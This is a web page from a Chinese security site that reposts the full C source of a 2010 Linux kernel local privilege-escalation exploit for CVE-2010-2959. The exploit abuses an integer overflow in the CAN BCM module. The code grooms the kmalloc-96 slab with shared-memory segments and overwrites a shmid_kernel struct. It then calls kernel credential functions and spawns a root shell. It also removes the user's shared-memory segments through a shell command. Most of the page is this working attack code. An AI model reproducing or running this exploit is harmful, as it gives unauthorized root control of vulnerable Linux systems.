首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
来源:http://jon.oberheide.org 作者:Oberheide 发布时间:2010-08-30  

/*
 * i-CAN-haz-MODHARDEN.c
 *
 * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
 *
 *   Ben Hawkes discovered an integer overflow in the Controller Area Network
 *   (CAN) subsystem when setting up frame content and filtering certain
 *   messages. An attacker could send specially crafted CAN traffic to crash
 *   the system or gain root privileges.
 *
 * Usage:
 *
 *   $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
 *   $ ./i-can-haz-modharden
 *   ...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   The allocation pattern of the CAN BCM module gives us some desirable
 *   properties for smashing the SLUB. We control the kmalloc with a 16-byte
 *   granularity allowing us to place our allocation in the SLUB cache of our
 *   choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
 *   old-times sake). The allocation can also be made in its own discrete
 *   stage before the overwrite which allows us to be a bit more conservative
 *   in ensuring the proper layout of our SLUB cache.
 *
 *   To exploit the vulnerability, we first create a BCM RX op with a crafted
 *   nframes to trigger the integer overflow during the kmalloc. On the second
 *   call to update the existing RX op, we bypass the E2BIG check since the
 *   stored nframes in the op is large, yet has an insufficiently sized
 *   allocation associated with it. We then have a controlled write into the
 *   adjacent shmid_kernel object in the 96-byte SLUB cache.
 *
 *   However, while we control the length of the SLUB overwrite via a
 *   memcpy_fromiovec operation, there exists a memset operation that directly
 *   follows which zeros out last_frames, likely an adjacent allocation, with
 *   the same malformed length, effectively nullifying our shmid smash. To
 *   work around this, we take advantage of the fact that copy_from_user can
 *   perform partial writes on x86 and trigger an EFAULT by setting up a
 *   truncated memory mapping as the source for the memcpy_fromiovec operation,
 *   allowing us to smash the necessary amount of memory and then pop out and
 *   return early before the memset operation occurs.
 *
 *   We then perform a dry-run and detect the shmid smash via an EIDRM errno
 *   from shmat() caused by an invalid ipc_perm sequence number. Once we're
 *   sure we have a shmid_kernel under our control we re-smash it with the
 *   malformed version and redirect control flow to our credential modifying
 *   calls mapped in user space.
 *
 *   Distros: please use grsecurity's MODHARDEN or SELinux's module_request
 *   to restrict unprivileged loading of uncommon packet families. Allowing
 *   the loading of poorly-written PF modules just adds a non-trivial and
 *   unnecessary attack surface to the kernel.
 *
 *   Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
 *   easily to other vulnerable kernels/distros. Careful, it could use some
 *   post-exploitation stability love as well.
 *
 *   Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
 *   this exploit borrows code from.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif

#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
 sa_family_t can_family;
 int can_ifindex;
 union {
  struct { uint32_t rx_id, tx_id; } tp;
 } can_addr;
};

struct can_frame {
 uint32_t can_id;
 uint8_t can_dlc;
 uint8_t data[8] __attribute__((aligned(8)));
};

struct bcm_msg_head {
 uint32_t opcode;
 uint32_t flags;
 uint32_t count;
 struct timeval ival1, ival2;
 uint32_t can_id;
 uint32_t nframes;
 struct can_frame frames[0];
};

#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
 struct list_head *next;
 struct list_head *prev;
};

struct super_block {
 struct list_head s_list;
 unsigned int s_dev;
 unsigned long s_blocksize;
 unsigned char s_blocksize_bits;
 unsigned char s_dirt;
 uint64_t s_maxbytes;
 void *s_type;
 void *s_op;
 void *dq_op;
 void *s_qcop;
 void *s_export_op;
 unsigned long s_flags;
} super_block;

struct mutex {
 unsigned int count;
 unsigned int wait_lock;
 struct list_head wait_list;
 void *owner;
};

struct inode {
 struct list_head i_hash;
 struct list_head i_list;
 struct list_head i_sb_list;
 struct list_head i_dentry_list;
 unsigned long i_ino;
 unsigned int i_count;
 unsigned int i_nlink;
 unsigned int i_uid;
 unsigned int i_gid;
 unsigned int i_rdev;
 uint64_t i_version;
 uint64_t i_size;
 unsigned int i_size_seqcount;
 long i_atime_tv_sec;
 long i_atime_tv_nsec;
 long i_mtime_tv_sec;
 long i_mtime_tv_nsec;
 long i_ctime_tv_sec;
 long i_ctime_tv_nsec;
 uint64_t i_blocks;
 unsigned int i_blkbits;
 unsigned short i_bytes;
 unsigned short i_mode;
 unsigned int i_lock;
 struct mutex i_mutex;
 unsigned int i_alloc_sem_activity;
 unsigned int i_alloc_sem_wait_lock;
 struct list_head i_alloc_sem_wait_list;
 void *i_op;
 void *i_fop;
 struct super_block *i_sb;
 void *i_flock;
 void *i_mapping;
 char i_data[84];
 void *i_dquot_1;
 void *i_dquot_2;
 struct list_head i_devices;
 void *i_pipe_union;
 unsigned int i_generation;
 unsigned int i_fsnotify_mask;
 void *i_fsnotify_mark_entries;
 struct list_head inotify_watches;
 struct mutex inotify_mutex;
} inode;

struct dentry {
 unsigned int d_count;
 unsigned int d_flags;
 unsigned int d_lock;
 int d_mounted;
 void *d_inode;
 struct list_head d_hash;
 void *d_parent;
} dentry;

struct file_operations {
 void *owner;
 void *llseek;
 void *read;
 void *write;
 void *aio_read;
 void *aio_write;
 void *readdir;
 void *poll;
 void *ioctl;
 void *unlocked_ioctl;
 void *compat_ioctl;
 void *mmap;
 void *open;
 void *flush;
 void *release;
 void *fsync;
 void *aio_fsync;
 void *fasync;
 void *lock;
 void *sendpage;
 void *get_unmapped_area;
 void *check_flags;
 void *flock;
 void *splice_write;
 void *splice_read;
 void *setlease;
} op;

struct vfsmount {
 struct list_head mnt_hash;
 void *mnt_parent;
 void *mnt_mountpoint;
 void *mnt_root;
 void *mnt_sb;
 struct list_head mnt_mounts;
 struct list_head mnt_child;
 int mnt_flags;
 const char *mnt_devname;
 struct list_head mnt_list;
 struct list_head mnt_expire;
 struct list_head mnt_share;
 struct list_head mnt_slave_list;
 struct list_head mnt_slave;
 struct vfsmount *mnt_master;
 struct mnt_namespace *mnt_ns;
 int mnt_id;
 int mnt_group_id;
 int mnt_count;
} vfsmount;

struct file {
 struct list_head fu_list;
 struct vfsmount *f_vfsmnt;
 struct dentry *f_dentry;
 void *f_op;
 unsigned int f_lock;
 unsigned long f_count;
} file;

struct kern_ipc_perm {
 unsigned int lock;
 int deleted;
 int id;
 unsigned int key;
 unsigned int uid;
 unsigned int gid;
 unsigned int cuid;
 unsigned int cgid;
 unsigned int mode;
 unsigned int seq;
 void *security;
};

struct shmid_kernel {
 struct kern_ipc_perm shm_perm;
 struct file *shm_file;
 unsigned long shm_nattch;
 unsigned long shm_segsz;
 time_t shm_atim;
 time_t shm_dtim;
 time_t shm_ctim;
 unsigned int shm_cprid;
 unsigned int shm_lprid;
 void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
{
 commit_creds(prepare_kernel_cred(0));
 return -1;
}

unsigned long
get_symbol(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 int ret = 0, oldstyle;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   return 0;
  oldstyle = 1;
 }

 while (ret != EOF) {
  if (!oldstyle) {
   ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
  } else {
   ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
     continue;
    }
    p = strrchr(sname, '_');
    if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_') {
      p--;
     }
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
   fclose(f);
   return addr;
  }
 }
 fclose(f);

 return 0;
}

int
check_slabinfo(char *cache, int *active_out, int *total_out)
{
 FILE *fp;
 char name[64], slab[256];
 int active, total, diff;

 memset(slab, 0, sizeof(slab));
 memset(name, 0, sizeof(name));

 fp = fopen("/proc/slabinfo", "r");
 if (!fp) {
  printf("[-] sorry, /proc/slabinfo is not available!");
  exit(1);
 }

 fgets(slab, sizeof(slab) - 1, fp);
 while (1) {
  fgets(slab, sizeof(slab) - 1, fp);
  sscanf(slab, "%s %u %u", name, &active, &total);
  diff = total - active;
  if (strcmp(name, cache) == 0) {
   break;
  }
 }
 fclose(fp);

 if (active_out) {
  *active_out = active;
 }
 if (total_out) {
  *total_out = total;
 }
 return diff;
}

void
trigger(void)
{
 int *shmids;
 int i, ret, sock, cnt, base, smashed;
 int diff, active, total, active_new, total_new;
 int len, sock_len, mmap_len;
 struct sockaddr_can addr;
 struct bcm_msg_head *msg;
 void *efault;
 char *buf;

 printf("[+] creating PF_CAN socket...\n");

 sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
 if (sock < 0) {
  printf("[-] kernel lacks CAN packet family support\n");
  exit(1);
 }

 printf("[+] connecting PF_CAN socket...\n");

 memset(&addr, 0, sizeof(addr));
 addr.can_family = PF_CAN;

 ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
 if (sock < 0) {
  printf("[-] could not connect CAN socket\n");
  exit(1);
 }

 len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
 msg = malloc(len);
 memset(msg, 0, len);
 msg->can_id = 2959;
 msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

 printf("[+] clearing out any active OPs via RX_DELETE...\n");
 
 msg->opcode = RX_DELETE;
 ret = send(sock, msg, len, 0);

 printf("[+] removing any active user-owned shmids...\n");

 system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

 printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");

 diff = check_slabinfo(SLUB, &active, &total);

 shmids = malloc(sizeof(int) * diff * 10);

 cnt = diff * 10;
 for (i = 0; i < cnt; ++i) {
  diff = check_slabinfo(SLUB, &active, &total);
  if (diff == 0) {
   break;
  }
  shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
 }
 base = i;

 if (diff != 0) {
  printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");
  exit(1);
 }

 printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");

 i = base;
 cnt = i + FILLER;
 for (; i < cnt; ++i) {
  shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
 }

 msg->opcode = RX_SETUP;
 ret = send(sock, msg, len, 0);
 if (ret < 0) {
  printf("[-] kernel rejected malformed CAN header\n");
  exit(1);
 }

 i = base + FILLER;
 cnt = i + FILLER;
 for (; i < cnt; ++i) {
  shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
 }

 printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");

 mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
 sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
 efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

 printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

 printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");

 msg = (struct bcm_msg_head *) efault;
 memset(msg, 0, mmap_len);
 msg->can_id = 2959;
 msg->nframes = (ALLOCATION / 16) * 4;

 msg->opcode = RX_SETUP;
 ret = send(sock, msg, mmap_len, 0);
 if (ret != -1 && errno != EFAULT) {
  printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
  exit(1);
 }

 printf("[+] seeking out the smashed shmid_kernel...\n");

 i = base;
 cnt = i + FILLER + FILLER;
 for (; i < cnt; ++i) {
  ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
  if (ret == -1 && errno == EIDRM) {
   smashed = i;
   break;
  }
 }
 if (i == cnt) {
  printf("[-] could not find smashed shmid, trying running the exploit again!\n");
  exit(1);
 }
 
 printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

 printf("[+] re-smashing the shmid_kernel with exploit payload...\n");

 shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;

 buf = (char *) msg;
 memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

 msg->opcode = RX_SETUP;
 ret = send(sock, msg, mmap_len, 0);
 if (ret != -1 && errno != EFAULT) {
  printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
  exit(1);
 }
 
 ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
 if (ret == -1 && errno != EIDRM) {
  setresuid(0, 0, 0);
  setresgid(0, 0, 0);

  printf("[+] launching root shell!\n");

  execl("/bin/bash", "/bin/bash", NULL);
  exit(0);
 }

 printf("[-] exploit failed! retry?\n");
}

void
setup(void)
{
 printf("[+] looking for symbols...\n");

 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("[-] symbol table not availabe, aborting!\n");
 }

 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("[-] symbol table not availabe, aborting!\n");
 }

 printf("[+] setting up exploit payload...\n");

 super_block.s_flags = 0;

 inode.i_size = 4096;
 inode.i_sb = &super_block;
 inode.inotify_watches.next = &inode.inotify_watches;
 inode.inotify_watches.prev = &inode.inotify_watches;
 inode.inotify_mutex.count = 1;

 dentry.d_count = 4096;
 dentry.d_flags = 4096;
 dentry.d_parent = NULL;
 dentry.d_inode = &inode;

 op.mmap = &kernel_code;
 op.get_unmapped_area = &kernel_code;

 vfsmount.mnt_flags = 0;
 vfsmount.mnt_count = 1;

 file.fu_list.prev = &file.fu_list;
 file.fu_list.next = &file.fu_list;
 file.f_dentry = &dentry;
 file.f_vfsmnt = &vfsmount;
 file.f_op = &op;

 shmid_kernel.shm_perm.key = IPC_PRIVATE;
 shmid_kernel.shm_perm.uid = getuid();
 shmid_kernel.shm_perm.gid = getgid();
 shmid_kernel.shm_perm.cuid = getuid();
 shmid_kernel.shm_perm.cgid = getgid();
 shmid_kernel.shm_perm.mode = -1;
 shmid_kernel.shm_file = &file;
}

int
main(int argc, char **argv)
{
 setup();
 trigger();
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·McAfee LinuxShield <= 1.5.1 Lo
·Exploit Title: Mozilla Thunder
·Leadtools ActiveX Raster Twain
·mini CMS / News Script Light 1
·Blogman v0.7.1 (profile.php) S
·Hycus CMS 1.0.1 Multiple Cross
·nginx v0.6.38 Heap Corruption
·PuTTY 0.60 DLL Hijacking Explo
·SnackAmp 3.1.2 Malicious SMP B
·bds/x86-bindshell on port 2525
·SnackAmp 3.1.2 Malicious WAV B
·bsd/x86-bindshell on port 2525
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved